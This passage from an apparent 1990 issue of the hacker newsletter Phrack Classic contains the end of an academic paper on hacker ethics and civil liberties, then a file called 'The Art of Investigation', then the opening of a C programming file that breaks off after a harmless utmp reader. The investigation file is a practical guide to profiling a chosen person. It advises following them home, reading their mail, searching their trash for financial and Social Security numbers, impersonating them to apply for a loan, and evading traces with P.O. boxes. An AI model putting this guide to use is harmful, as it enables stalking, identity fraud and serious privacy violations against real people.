  1332. Drake told me that he was concerned about the increasing amount of
  1333. information about individuals that is stored in large data banks,
  1334. and the inability of the individual to have much control over the
  1335. use of that information.  He suggests that the individual might be
  1336. co-owner of information collected about him or her, with control
  1337. over the use of that information.  He also says that an individual
  1338. should be free to withhold personal information, of course paying
  1339. the consequences of doing so (e.g., not getting a drivers license
  1340. or credit card).  In fact, all Federal Government forms are required
  1341. to contain a Privacy Act Statement that states how the information
  1342. being collected will be used and, in some cases, giving the option
  1343. of withholding the information.
  1344.  
  1345. Goldstein has also challenged the practices of law enforcement agencies
  1346. in their attempt to crack down on hackers (Goldstein90).  He said
  1347. that all incoming and outgoing electronic mail used by ``Phrack''
  1348. was monitored before the newsletter was shutdown by authorities.
  1349. ``Had a printed magazine been shut down in this fashion after having
  1350. all of their mail opened and read, even the most thick-headed
  1351. sensationalist media types would have caught on: hey, isn't that
  1352. a violation of the First Amendment?''  He also cites the shutdown
  1353. of several bulletin boards as part of Operation Sun Devil, and quotes
  1354. the administrator of the bulletin board Zygot as saying ``Should
  1355. I start reading my users' mail to make sure they aren't saying anything
  1356. naughty?  Should I snoop through all the files to make sure everyone
  1357. is being good?  This whole affair is rather chilling.''  The
  1358. administrator for the public system The Point wrote ``Today, there
  1359. is no law or precedent which affords me ... the same legal rights
  1360. that other common carriers have against prosecution should some other
  1361. party (you) use my property (The Point) for illegal activities.
  1362. That worries me ...''
  1363.  
  1364. About 40 personal computer systems and 23,000 data disks were seized
  1365. under Operation Sun Devil, a two-year investigation involving the
  1366. FBI, Secret Service, and other federal and local law enforcement
  1367. officials.  In addition, the Secret Service acknowledges that its
  1368. agents, acting as legitimate users, had secretly monitored computer
  1369. bulletin boards (Markoff90a).  Markoff reports that California
  1370. Representative Don Edwards, industry leader Mitchell Kapor, and civil
  1371. liberties advocates are alarmed by these government actions, saying
  1372. that they challenge freedom of speech under the First Amendment and
  1373. protection against searches and seizures under the Fourth Amendment.
  1374. Markoff asks: ``Will fear of hackers bring oppression?''
  1375.  
  1376. John Barlow writes ``The Secret Service may actually have done a
  1377. service for those of us who love liberty.  They have provided us
  1378. with a devil.  And devils, among their other galvanizing virtues,
  1379. are just great for clarifying the issues and putting iron in your
  1380. spine,'' (Barlow90).  Some of the questions that Barlow says need
  1381. to be addressed include ``What are data and what is free speech?
  1382. How does one treat property which has no physical form and can be
  1383. infinitely reproduced?  Is a computer the same as a printing press?''
  1384. Barlow urges those of us who understand the technology to address
  1385. these questions, lest the answers be given to us by law makers and
  1386. law enforcers who do not.   Barlow and Kapor are constituting a
  1387. foundation to ``raise and disburse funds for education, lobbying,
  1388. and litigation in the areas relating to digital speech and the
  1389. extension of the Constitution into Cyberspace.''
  1390.  
  1391. 8.  Conclusions
  1392.  
  1393.  
  1394. Hackers say that it is our social responsibility to share information,
  1395. and that it is information hoarding and disinformation that are the
  1396. crimes.  This ethic of resource and information sharing contrasts
  1397. sharply with computer security policies that are based on authorization
  1398. and ``need to know.'' This discrepancy raises an interesting question:
  1399. Does the hacker ethic reflect a growing force in society that stands
  1400. for greater sharing of resources and information -- a reaffirmation
  1401. of basic values in our constitution and laws?  It is important that
  1402. we examine the differences between the standards of hackers, systems
  1403. managers, users, and the public.  These differences may represent
  1404. breakdowns in current practices, and may present new opportunities
  1405. to design better policies and mechanisms for making computer resources
  1406. and information more widely available.
  1407.  
  1408. The sentiment for greater information sharing is not restricted to
  1409. hackers.  In the best seller, ``Thriving on Chaos,'' Tom Peters
  1410. (Peters87) writes about sharing within organizations: ``Information
  1411. hoarding, especially by politically motivated, power-seeking staffs,
  1412. has been commonplace throughout American industry, service and
  1413. manufacturing alike.  It will be an impossible millstone around the
  1414. neck of tomorrow's organizations.  Sharing is a must.''  Peters argues
  1415. that information flow and sharing is fundamental to innovation and
  1416. competitiveness.  On a broader scale, Peter Drucker (Drucker89) says
  1417. that the ``control of information by government is no longer possible.
  1418. Indeed, information is now transnational.  Like money, it has no
  1419. `fatherland.' ''
  1420.  
  1421. Nor is the sentiment restricted to people outside the computer security
  1422. field.  Harry DeMaio (DeMaio89) says that our natural urge is to
  1423. share information, and that we are suspicious of organizations and
  1424. individuals who are secretive.  He says that information is exchanged
  1425. out of ``want to know'' and mutual accommodation rather than ``need
  1426. to know.''  If this is so, then some of our security policies are
  1427. out of step with the way people work.  Peter Denning (DenningP89)
  1428. says that information sharing will be widespread in the emerging
  1429. worldwide networks of computers and that we need to focus on ``immune
  1430. systems'' that protect against mistakes in our designs and recover
  1431. from damage.
  1432.  
  1433. I began my investigation of hackers with the question, who are they
  1434. and what is their culture and discourse?  My investigation uncovered
  1435. some of their concerns, which provided the organizational structure
  1436. to this paper, and several suggestions for new actions that might
  1437. be taken.  My investigation also opened up a broader question:  What
  1438. conflict in society do hackers stand at the battle lines of?  Is
  1439. it owning or restricting information vs. sharing information -- a
  1440. tension between an age-old tradition of controlling information as
  1441. property and the Englightenment tradition of sharing and disseminating
  1442. information?  Is it controlling access based on ``need to know,''
  1443. as determined by the information provider, vs. ``want to know,''
  1444. as determined by the person desiring access?   Is it law enforcement
  1445. vs. freedoms granted under the First and Fourth Amendments?  The
  1446. answers to these questions, as well as those raised by Barlow on
  1447. the nature of information and free speech, are important because
  1448. they tell us whether our policies and practices serve us as well
  1449. as they might.  The issue is not simply hackers vs. system managers
  1450. or law enforcers; it is a much larger question about values and
  1451. practices in an information society.
  1452.  
  1453.  
  1454. Acknowledgments
  1455.  
  1456. I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
  1457. Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
  1458. Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
  1459. Alex for their comments on earlier versions of this paper and helpful
  1460. discussions; to Richard Stallman for putting me in contact with
  1461. hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
  1462. Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
  1463. and Richard Pethia for a summary of some of his experiences at CERT.
  1464. The opinions expressed here, however, are my own and do not necessarily
  1465. represent those of the people mentioned above or of Digital Equipment
  1466. Corporation.
  1467.  
  1468.  
  1469. References
  1470.  
  1471.  
  1472. ACM90
  1473.   ``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
  1474.  
  1475. Baird87
  1476.   Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
  1477.   Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
  1478.   p. 471-478.
  1479.  
  1480. Barlow90
  1481.   John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
  1482.   Earth Review.
  1483.  
  1484. Corley89
  1485.   Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
  1486.   Protection, Bantam Books, New York, 1989, p. 67-72.
  1487.  
  1488. DeMaio89
  1489.   Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
  1490.   Proc. of the 12th National Computer Security Conference, 1989,
  1491.   p. 630-633.
  1492.  
  1493. DenningP89
  1494.   Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
  1495.   Sept.-Oct., 1989.
  1496.  
  1497. DenningP90
  1498.   Peter J. Denning, Computers Under Attack, ACM Press, 1990.
  1499.  
  1500. Dibbel90
  1501.   Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
  1502.  
  1503. Drucker89
  1504.   Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
  1505.  
  1506. Felsenstein86
  1507.   Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
  1508.   ACM Panel on Hacking (Lee86).
  1509.  
  1510. Frenkel87
  1511.   Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
  1512.   Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
  1513.  
  1514. Goldstein89
  1515.   Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
  1516.   Spring 1989.
  1517.  
  1518. Goldstein90
  1519.   Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
  1520.   No. 1, Spring 1990.
  1521.  
  1522. Goodfellow83
  1523.   Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
  1524.   Transportation, Aviation, and Materials on the Subject of
  1525.   Telecommunications Security and Privacy,'' Sept. 26, 1983.
  1526.  
  1527. Hafner90
  1528.   Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
  1529.   p. 15-16.
  1530.  
  1531. Harpers90
  1532.   ``Is Computer Hacking a Crime?" Harper's, March 1990, p. 45-57.
  1533.  
  1534. Harvey86
  1535.   Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
  1536.   ACM Panel on Hacking (Lee86).
  1537.  
  1538. HollingerLanza-Kaduce88
  1539.   Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
  1540.   Criminalization: The Case of Computer Crime Laws,'' Criminology,
  1541.   Vol. 26, No. 1, 1988, p. 101-126.
  1542.  
  1543. Huebner89
  1544.   Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
  1545.   Vol. 8, Issue 37, 1989.
  1546.  
  1547. Landreth89
  1548.   Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
  1549.  
  1550. Lee86
  1551.   John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
  1552.   Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
  1553.   Vol. 29, No. 4, April 1986, p. 297-299; full report available from
  1554.   ACM Headquarters, New York.
  1555.  
  1556. Levy84
  1557.   Steven Levy, Hackers, Dell, New York, 1984.
  1558.  
  1559. Markoff90
  1560.   John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
  1561.   The New York Times, March 19, 1990.
  1562.  
  1563. Markoff90a
  1564.   John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
  1565.   The New York Times, June 3, 1990.
  1566.  
  1567. Martin89
  1568.   Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
  1569.   Proc. of the 12th National Computer Security Conference, 1989.
  1570.  
  1571. Meyer89
  1572.   Gordon R. Meyer, The Social Organization of the Computer Underground,
  1573.   Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
  1574.   1989.
  1575.  
  1576. MeyerThomas90
  1577.   Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
  1578.   A Postmodernist Interpretation of the Computer Underground,'' Dept.
  1579.   of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
  1580.  
  1581. Peters87
  1582.   Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
  1583.   p. 610, 1987.
  1584.  
  1585. Spafford89
  1586.   Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
  1587.   Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
  1588.  
  1589. Stallman84
  1590.   Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
  1591.   No. 1, Jan. 1984, p. 8-9.
  1592.  
  1593. Stallman90
  1594.   Richard M. Stallman, ``Against User Interface Copyright'' to appear
  1595.   in Comm. ACM.
  1596.  
  1597. Steele83
  1598.   Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
  1599.   Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow,  The
  1600.   Hacker's Dictionary, Harper & Row, New York, 1983.
  1601.  
  1602. Stoll90
  1603.   Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
  1604.  
  1605. Thomas90
  1606.   Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
  1607.   Digest, Issue #1.06, April 27, 1990.
  1608.  
  1609. ThomasMeyer90
  1610.   Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
  1611.   (Witch)Hunting for the Computer Underground,''  Unpublished
  1612.   manuscript, Department of Sociology, Northern Illinois University,
  1613.   DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
  1614.   1, Issue 11, June 16, 1990.
  1615.  
  1616. _______________________________________________________________________________
  1617.  
  1618.                               ==Phrack Classic==
  1619.  
  1620.                      Volume Three, Issue 32, File #4 of 12
  1621.  
  1622.  
  1623. *****         T H E    A R T    O F    I N V E S T I G A T I O N         *****
  1624. *****                                                                    *****
  1625. *****                                                                    *****
  1626. *****                       Brought to You By                            *****
  1627. *****                                                                    *****
  1628. *****                          The Butler                                *****
  1629. *****                                                                    *****
  1630. *****                           10/31/90                                 *****
  1631. *****                                                                    *****
  1632. *****                                                                    *****
  1633.  
  1634. There are many ways to obtain information about individuals.  I am going to
  1635. cover some of the investigative means of getting the low down on people whom
  1636. you wish to know more about.
  1637.  
  1638. Some of the areas I will cover are:
  1639.  
  1640. Social Security Checks
  1641. Driving/Vehicular Records
  1642. Police Reports
  1643. FBI Records
  1644. Insurance Records
  1645. Legal Records
  1646. Credit Bureau Checks
  1647. Probate Records
  1648. Real Estate Records
  1649. Corporate Records
  1650. Freedom Of Information Act
  1651. Governmental Agency Records
  1652. Maps
  1653. Tax Records
  1654.  
  1655. To obtain information from some organizations or some individuals one must be
  1656. able to "BULLSHIT"!!! Not only by voice but in writing.  Many times you must
  1657. write certain governmental bodies requesting info and it can only be done in
  1658. writing.  I can't stress enough the need for proper grammer and spelling.
  1659.  
  1660. For you to obtain certain information about another person you must first
  1661. get a few KEY pieces of info to make your investigation easier.  The persons
  1662. Full Name, Social Security Number, Date & Place of Birth will all make your
  1663. search easier and more complete.
  1664.  
  1665. First of all in most cases you will know the persons name you want to invest-
  1666. igate.  If not you must obtain it any way you can.  First you could follow them
  1667. to their home and get their address.  Then some other time when they are gone
  1668. you could look at their mail or dig through their trash to get their Full Name.
  1669. While in their trash you might even be able to dig up more interesting info
  1670. like:  Bank Accout Numbers, Credit Card Numbers, Social Security Number, Birth
  1671. Day, Relatives Names, Long Distance Calls Made, etc.
  1672.  
  1673. If you can't get to their trash for some reason take their address to your
  1674. local library and check it against the POLKS and COLES Directories.  This
  1675. should provide you with their Full Name, Phone Number, Address, and how long
  1676. they have lived at the current location.
  1677.  
  1678. You can also check the Local Phone Book, Directory Assistance, City Directories,
  1679. Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
  1680. electric, phone, cable, etc.)
  1681.  
  1682. If you know someone who works at a bank or car dealer you could have them run
  1683. a credit check which will reveal all of their credit cards and if they have
  1684. ever had any late payments or applied for any loans. If you are brave enough
  1685. you could even apply for a loan impersonating the individual under investigation
  1686.  
  1687. The Credit Bureau also has Sentry Services that can provide deceased social
  1688. security numbers, postal drop box address and known fraudulent information.
  1689.  
  1690. You can get an individuals driving record by sending a letter to your states
  1691. Department of Revenue, Division of Vehicles.  You can also get the following:
  1692.  
  1693. Driver Control Bureau
  1694. For Driving Record send Name, Address, Date of Birth and usually a $1 process-
  1695. ing fee for a 5 year record.
  1696.  
  1697. Titles & Registration Bureau
  1698. For ownership information (current and past).
  1699.  
  1700. Driver License Examination Bureau
  1701. To see what vision was rated.
  1702.  
  1703. Motor Carrier Inspection & Registration Bureau
  1704. To check on licensing and registration of trucks/trucking companies.
  1705.  
  1706. Revocation Dept
  1707. Can verify if someone's driver's license has ever been suspended or revoked.
  1708.  
  1709. You can even obtain a complete vehicle history by sending the vehicle descrip-
  1710. tion, identification # for the last registered owner, and a small fee.  Send
  1711. this info to your states Dept of Vehicles.  It is best to contact them first
  1712. to get their exact address and fees.  I would advise using a money orders and
  1713. a P.O. Box so they cannot trace it to you without a hassle.
  1714.  
  1715. Police Records
  1716.  
  1717. All Police and Fire Records are Public record unless the city is involved.
  1718. You can usually get everything available from the police dept including:
  1719. Interviews, maps, diagrams, misc reports, etc.
  1720.  
  1721.  
  1722. FBI Records
  1723.  
  1724. If the individual you are inquiring about is deceased the FBI will provide
  1725. some info if you give them Full Name, SSN, Date & Place of Birth.  Contact
  1726. you local FBI office to get the details.
  1727.  
  1728.  
  1729. Real Estate Records
  1730.  
  1731. Recorder of Deeds offices in each county maintain land ownership records.
  1732. Most are not computerized and you have to manually search.  Then you must
  1733. review microfilm/fiche for actual deeds of trust, quit claim deeds,
  1734. assignments, mortgage, liens, etc.
  1735.  
  1736. A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
  1737. which will show ownership, mortgage info, easements, taxes owned, taxes
  1738. assessed, etc.
  1739.  
  1740. Most county assessors will provide an address and value of any real property
  1741. if you request a search by name.
  1742.  
  1743.  
  1744. Social Security Records
  1745.  
  1746. Social Security Administrator
  1747. Office of Central Records Operations
  1748. 300 North Greene Street
  1749. Baltimore, Maryland 21201
  1750. 301-965-8882
  1751.  
  1752. Title II and Title XVI disability claims records, info regarding total earnings
  1753. for each year, detailed earnings information show employer, total earnings, and
  1754. social security paid for each quarter by employer.
  1755.  
  1756. Prices are approximately as follows:
  1757.  
  1758. 1st year of records                        $15.00
  1759. 2nd-5th year of records                    $ 2.50 per person
  1760. 6th-10th year of records                   $ 2.00 per person
  1761. 11th-15th year of records                  $ 1.50 per person
  1762. 16th-on year of records                    $ 1.00 per person
  1763.  
  1764. **  Call for verification of these prices.  **
  1765.  
  1766. Social Security records are a great source of information when someone has
  1767. been relatively transient in their work, or if they are employed out of a
  1768. union hall.
  1769.  
  1770. If you want to review a claim file, direct your request to the Baltimore
  1771. office.  They will send the file to the social security office in your city
  1772. for you to review and decide what you want copies of.
  1773.  
  1774. The first three digits of a social security number indicate the state of
  1775. application.
  1776.  
  1777.                  The Social Security Number
  1778.  
  1779. SSA has continually emphasized the fact that the SSN identifies a particular
  1780. record only and the Social Security Card indicates the person whose record is
  1781. identified by that number. In no way can the Social Security Card identify
  1782. the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
  1783. on the face of the card.  However, many people ignored the message and the
  1784. legend was eventually dropped.  The social security number is the most widely
  1785. used and carefully controlled number in the country, which makes it an
  1786. attractive identifier.
  1787.  
  1788. With the exception of the restrictions imposed on Federal and some State and
  1789. local organizations by the Privacy Act of 1974, organizations requiring a
  1790. unique identifier for purposes of controlling their records are not prohibited
  1791. from using (with the consent of the holder) the SSN. SSA records are
  1792. confidential and knowledge of a person's SSN does not give the user access to
  1793. information in SSA files which is confidential by law.
  1794.  
  1795. Many commercial enterprises have used the SSN in various promotional efforts.
  1796. These uses are not authorized by SSA, but SSA has no authority to prohibit
  1797. such activities as most are not illegal. Some of these unauthorized uses are:
  1798. SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
  1799. pocketbook numbers (the numbers used on sample social security cards in
  1800. wallets); misleading advertising, commercial enterprises charging fees for SSN
  1801. services; identification of personal property.
  1802.  
  1803. The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
  1804. the Area, Group, and Serial.  For the most part, (there are exceptions), the
  1805. Area is determined by where the individual APPLIED for the SSN (before 1972)
  1806. or RESIDED at time of application (after 1972). The areas are assigned as
  1807. follows:
  1808.  
  1809. 000     unused   387-399 WI    528-529 UT
  1810. 001-003 NH       400-407 KY    530     NV
  1811. 004-007 ME       408-415 TN    531-539 WA
  1812. 008-009 VT       416-424 AL    540-544 OR
  1813. 010-034 MA       425-428 MS    545-573 CA
  1814. 035-039 RI       429-432 AR    574     AK
  1815. 040-049 CT       433-439 LA    575-576 HI
  1816. 050-134 NY       440-448 OK    577-579 DC
  1817. 135-158 NJ       449-467 TX    580     VI Virgin Islands
  1818. 159-211 PA       468-477 MN    581-584 PR Puerto Rico
  1819. 212-220 MD       478-485 IA    585     NM
  1820. 221-222 DE       486-500 MO    586     PI Pacific Islands*
  1821. 223-231 VA       501-502 ND    587-588 MS
  1822. 232-236 WV       503-504 SD    589-595 FL
  1823. 237-246 NC       505-508 NE    596-599 PR Puerto Rico
  1824. 247-251 SC       509-515 KS    600-601 AZ
  1825. 252-260 GA       516-517 MT    602-626 CA
  1826. 261-267 FL       518-519 ID    *Guam, American Samoa,
  1827. 268-302 OH       520     WY     Northern Mariana Islands,
  1828. 303-317 IN       521-524 CO     Philippine Islands
  1829. 318-361 IL       525     NM
  1830. 362-386 MI       526-527 AZ
  1831.  
  1832. 627-699 unassigned, for future use
  1833.  
  1834. 700-728 Railroad workers through 1963, then discontinued
  1835. 729-899 unassigned, for future use
  1836. 900-999 not valid SSNs, but were used for program purposes
  1837.           when state aid to the aged, blind and disabled was
  1838.           converted to a federal program administered by SSA.
  1839.  
  1840. As the Areas assigned to a locality are exhausted, new areas from the pool are
  1841. assigned.  This is why some states have non-contiguous groups of Areas.
  1842.  
  1843. The Group portion of the SSN has no meaning other than to determine whether or
  1844. not a number has been assigned. SSA publishes a list every month of the
  1845. highest group assigned for each SSN Area.  The order of assignment for the
  1846. Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
  1847. except for 00 which is never used, and odd numbers over 10. For example, if the
  1848. highest group assigned for area 999 is 72, then we know that the number
  1849. 999-04-1234 is an invalid number because even Groups under 9 have not yet been
  1850. assigned.
  1851.  
  1852. The Serial portion of the SSN has no meaning. The Serial is not assigned in
  1853. strictly numerical order. The Serial 0000 is never assigned.
  1854.  
  1855. Before 1973, Social Security Cards with pre-printed numbers were issued to
  1856. each local SSA office. The numbers were assigned by the local office. In 1973,
  1857. SSN assignment was automated and outstanding stocks of pre-printed cards were
  1858. destroyed.  All SSNs are now assigned by computer from headquarters.  There
  1859. are rare cases in which the computer system can be forced to accept a manual
  1860. assignment such as a person refusing a number with 666 in it.
  1861.  
  1862. A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
  1863. an explanation of the SSN's structure and the method of assigning and
  1864. validating Social Security numbers.
  1865.  
  1866.  
  1867. Tax Records
  1868.  
  1869. If you can find out who does the individuals taxes you might be able to get
  1870. copies from them with the use of creative social engineering.
  1871.  
  1872. If you want to run a tax lien search there is a service called Infoquest.
  1873. 1-800-777-8567 for a fee.  Call with a specific request.
  1874.  
  1875.  
  1876. Post Office Records
  1877.  
  1878. If you have an address for someone that is not current, always consider writing
  1879. a letter to the postmaster of whatever post office branch services the zip code
  1880. of the missing person.  Provide them the name and the last known address and
  1881. simply ask for the current address.  There might be a $1 fee for this so it
  1882. would be wise to call first.
  1883.  
  1884. City Directory, Polk's, Cole's, etc.
  1885.  
  1886. Information in these directories is contained alphabetically by name,
  1887. geographically by street address, and numerically by telephone number, so if
  1888. you have any of those three pieces of info, a check can be done.  The Polk's
  1889. directory also shows whether the person owns their home or rents, their marital
  1890. status, place of employment, and a myriad of other tidbits of information.
  1891. However, these books are not the be-all and end-all of the information as they
  1892. are subject to public and corporate response to surveys.  These directories are
  1893. published on a nationwide basis so if you are looking for someone outside of
  1894. your area, simply call the public library in the area you have an interest and
  1895. they also can perform a crisscross check for you.
  1896.  
  1897. You can also call a service owned by Cole's called the National Look up Library
  1898. at 402-473-9717 and either give a phone number and get the name & address or
  1899. give the address and get the name and phone number.  This is only available to
  1900. subscribers, which costs $183.00 dollars for 1991.  A subscriber gets two free
  1901. lookups per day and everyone after that costs $1.25.  A subscriber can also mail
  1902. in a request for a lookup to:
  1903.  
  1904. National Look Up Library
  1905. 901 W. Bond Street
  1906. Lincoln, NE 68521-3694
  1907.  
  1908. A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
  1909. detailed financial analysis of any bank.
  1910.  
  1911. 505 Barton Springs Road
  1912. Austin, Texas 78704
  1913. 512-472-2244
  1914.  
  1915. Professional Credit Checker & Nationwide SSN-locate.
  1916.  
  1917. !Solutions! Publishing Co.
  1918. 8016 Plainfield Road
  1919. Cincinnati, Ohio 45236
  1920. 513-891-6145
  1921. 1-800-255-6643
  1922.  
  1923. Top Secret Manuals
  1924.  
  1925. Consumertronics
  1926. 2011 Crescent Drive
  1927. P.O. Drawer 537-X
  1928. Alamogordo, New Mexico 88310
  1929. 505-434-0234
  1930.  
  1931.  
  1932. Federal Government Information Center is located at
  1933.  
  1934. 1520 Market Street
  1935. St. Louis, Missouri
  1936. 1-800-392-7711
  1937.  
  1938.  
  1939. U.S. Dept of Agriculture has located aerial photos of every inch of the United
  1940. States.
  1941.  
  1942. 2222 West 2300 S.
  1943. P.O. Box 36010
  1944. Salt Lake City, Utah 84130
  1945. 801-524-5856
  1946.  
  1947.  
  1948. To obtain general information regarding registered agent, principals, and good
  1949. standing  status, simply call the Corporate Division of the Secretary of State
  1950. and they will provide that information over the phone.  Some corporate divisions
  1951. are here:
  1952.  
  1953. Arkansas Corporate Division   501-371-5151
  1954. Deleware Corporate Division   302-736-3073
  1955. Georgia Corporate Division    404-656-2817
  1956. Indiana Corporate Division    317-232-6576
  1957. Kansas Corporate Division     913-296-2236
  1958. Louisiana Corporate Division  504-925-4716
  1959. Missouri Corporate Division   314-751-4936
  1960. New York Corporate Division   518-474-6200
  1961. Texas Corporate Division      512-475-3551
  1962.  
  1963.  
  1964. Freedom Of Information
  1965.  
  1966. The Freedom of Information Act allows the public to request information
  1967. submitted to, or generated by, all executive departments, military departments,
  1968. government or government controlled corporations, and regulatory agencies. Each
  1969. agency, as described above, publishes in the Federal Register, descriptions of
  1970. its central and field organizations and places where and how requests are to be
  1971. directed. Direct a letter to the appropriate person designated in the Federal
  1972. Register requesting reasonably described records be released to you pursuant to
  1973. the Freedom of Information Act.  Be sure to follow each agency's individually
  1974. published rules which state the time, place, fees, and procedures for the
  1975. provisions of information.  The agency should promptly respond.
  1976.  
  1977. How to Find Information About Companies, Ed. II, 1981, suggests, "Government
  1978. personnel you deal with sometimes become less helpful if you approach the
  1979. subject by threatening the Freedom of Information Act action - it's best to ask
  1980. for the material informally first."  While this will probably enable you to find
  1981. the correct person to send your request to, be prepared to spend at least half
  1982. an hour on the phone talking to several people before you find the person who
  1983. can help you.  The book also has a brief description of what each governmental
  1984. agency handles.
  1985.  
  1986. If you want to see if someone you are trying to locate is a veteran, has a
  1987. federal VA loan, or receives some sort of disability benefit, use Freedom
  1988. of Information and provide the person's SSN.
  1989.  
  1990. You will get a bill but you can ask for a fee waiver if this contributes to a
  1991. public understanding of the operation of the government.  You can also request
  1992. an opportunity to go through the files yourself and then decide what you want
  1993. copied.
  1994.  
  1995.  
  1996. Insurance Records
  1997.  
  1998. PIP carrier records (may contain statements, medical records, new doctors/
  1999. hospital names,  records of disability payments, adjuster's opinions,
  2000. applications for insurance coverage, other claim info, etc.)
  2001.  
  2002. Health insurance records (may contain medical records, record of bills, new
  2003. doctors/hospital names, pre-existing conditions information, info regarding
  2004. other accidetns/injuries, etc.)
  2005.  
  2006. Often you will have to go through the claims office, the underwriting dept, and
  2007. the business office to get complete records as each individual dept maintains
  2008. its own seperate files.
  2009.  
  2010.  
  2011. Workers Compensation
  2012.  
  2013. Some states will let you simply request records.  Just submit your request
  2014. including the SSN and Birthdate, to the Department of Human Resources, Division
  2015. of Worker's Compensation.  They will photocopy the records and send you the
  2016. copies.  Other states require an authorization to obtain these records.
  2017.  
  2018.  
  2019. You can always call your local Private Investigator pretending you are a
  2020. student doing a research paper on the methods of getting personal information
  2021. about people or even trash his place to find tips on tracking down people.
  2022.  
  2023. I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
  2024. by The Butler will...........
  2025.  
  2026.  
  2027.                                         Till Next Time,
  2028.  
  2029.  
  2030.                                         The Butler...
  2031. _______________________________________________________________________________
  2032.  
  2033.                               ==Phrack Classic==
  2034.  
  2035.                      Volume Three, Issue 32, File #5 of 12
  2036.  
  2037.  
  2038.         *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
  2039.         %P                                                           P%
  2040.         %H                  C UNIX `nasties' PART I                  H%
  2041.         %A                            by                             A%
  2042.         %Z             Sir Hackalot of PHAZE (10/20/90)              Z%
  2043.         %E                                                           E%
  2044.         *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
  2045.  
  2046.  
  2047. o Purpose of this file:
  2048.  
  2049.  
  2050.         The purpose of this file is to share small C programs for the Unix
  2051.         System V and/or BSD 4.3 operating systems which as in logical terms,
  2052.         "Nasty".  This "Nasty" can be termed better as Annoyance programs
  2053.         or tricky programs.
  2054.  
  2055.         The purpose of this text however, is NOT to teach one how to program
  2056.         in C and or how to use the C compiler on Unix systems.  This textfile
  2057.         assumes you have a working knowledge of programming with C in the
  2058.         UNIX environment.
  2059.  
  2060.  
  2061.  
  2062. o The UTMP Reader:
  2063.   ~~~~~~~~~~~~~~~~
  2064.  
  2065.         First, I would like to start this text off by posting in a generic
  2066.         /etc/utmp reader.  The /etc/utmp reader is essential for applications
  2067.         that deal with all the users online at a given time.
  2068.  
  2069.         Here is the source:
  2070.  
  2071. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2072.  
  2073.  
  2074. /* WhatTTY -- Generic WHO
  2075. UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
  2076.  
  2077. This is basically a skeleton program that is just a base for any UTMP
  2078. operations.
  2079.  
  2080. This is the skeleton that PhaZe(soft) uses for anything that deals
  2081. with reading the utmp file, such as MBS, SEND, VW, MME, and other
  2082. utilities.
  2083.  
  2084. Applications: You can use this when you need to do something to
  2085. everyone online, or when you need some sort of data from utmp, wtmp
  2086. or any file that is like utmp.
  2087. */
  2088.  
  2089. #include <stdio.h>
  2090. #include <sys/types.h> /* This is the key to the whole thing */
  2091. #include <utmp.h>
  2092. #include <fcntl.h>
  2093.  
  2094.  
  2095. main()
  2096. {
  2097.         int handle;
  2098.         char *etc = "/etc/utmp";
  2099.         struct utmp user;
  2100.  
  2101.         handle = open(etc,O_RDONLY);
  2102.  
  2103.         while(read(handle,&user,sizeof(user)) != 0) {
